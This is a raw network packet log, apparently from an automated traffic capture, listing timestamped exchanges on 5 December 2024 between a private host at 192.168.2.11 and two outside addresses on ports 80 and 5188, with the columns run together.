                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.395664930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.396585941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.396632910 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.396675110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.396714926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.397758961 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.397800922 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.397927999 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.398159027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.398912907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.399029016 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.399148941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.399260044 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.400064945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.400121927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.400163889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.400204897 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.401859045 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.401890039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.401937008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.402755022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.402805090 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.402848005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.402895927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.403706074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.403753996 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.403904915 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.403963089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.404632092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.404679060 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.428905964 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.428970098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.429048061 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.429354906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.429502010 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.429547071 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.430634975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.430779934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.430830956 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.431747913 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.431788921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.432861090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.432907104 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.432988882 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.433377028 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.433922052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.434176922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.434271097 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.435033083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.435558081 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.436156034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.436203957 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.436342955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.437309027 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.437357903 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.437683105 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.437747002 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.438446999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.438602924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.438700914 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.439585924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.439814091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.439857960 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.440706015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.440758944 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.440812111 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.441893101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.442074060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.442172050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.443064928 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.443170071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.444000959 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.444175005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.444453001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.444535017 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.445283890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.445497990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.445557117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.446439028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.446665049 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.446743011 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.447524071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.447884083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.447926998 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.448689938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.448807955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.449810028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.449852943 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.449947119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.450800896 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.451070070 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.451240063 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.452032089 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.452100992 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.452425957 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.452486038 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.453259945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.453361988 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.453511000 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.454384089 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.454658031 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.454751968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.455518007 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.456023932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.456741095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.456789970 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.456828117 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.457823992 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.457865953 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.458003998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.458899021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.458997011 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.459352016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.459397078 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.460151911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.460287094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.460340977 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.461261034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.461458921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.461570024 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.462358952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.462604046 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.462649107 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.463464975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.463515997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.463567972 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.464637041 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.464761972 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.465773106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.465818882 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.465827942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.465961933 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.466907024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.466985941 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.467119932 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.468065977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.468291044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.468338966 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.469167948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.469340086 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.469755888 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.470333099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.470352888 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.471445084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.471508980 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.471513033 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.472558022 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.472564936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.472636938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.472719908 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.473721981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.473824978 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.474910021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.474978924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.474980116 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.475977898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.476042032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.476207018 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.476268053 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.477150917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.477199078 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.477253914 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.478393078 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.478441000 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.478521109 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.479468107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.479481936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.479561090 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.480688095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.480700016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.481667042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.481750965 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.481779099 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.482387066 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.482829094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.483067989 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.483144045 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.484036922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.484069109 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.484112024 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.485101938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.485304117 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.485409975 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.486238956 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.486577988 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.486619949 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.487375021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.487508059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.487601995 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.488459110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.533627987 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.536268950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.536329031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.536392927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.536858082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.536902905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.537060022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.537100077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.537972927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.538038969 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.538075924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.538121939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.539146900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.539212942 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.539242983 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.539284945 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.540350914 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.540396929 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.540445089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.541414022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.541467905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.542224884 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.542278051 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.542566061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.542731047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.542776108 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.543756962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.543826103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.544487953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.544578075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.545026064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.545074940 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.545105934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.545145035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.546077967 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.546216011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.546253920 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.547195911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.547256947 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.547363997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.547411919 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.548358917 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.548404932 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.548410892 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.548446894 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.549504995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.549551010 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.549592972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.549632072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.550698042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.551001072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.551050901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.551898003 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.551940918 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.552124023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.552164078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.552999973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.553019047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.553042889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.553060055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.554217100 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.554434061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.554478884 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.555294037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.555330038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.555416107 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.555454969 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.556463957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.556477070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.556509972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.556524038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.557650089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.557791948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.557836056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.558751106 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.558796883 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.558845043 CET8049793185.215.113.84192.168.2.11
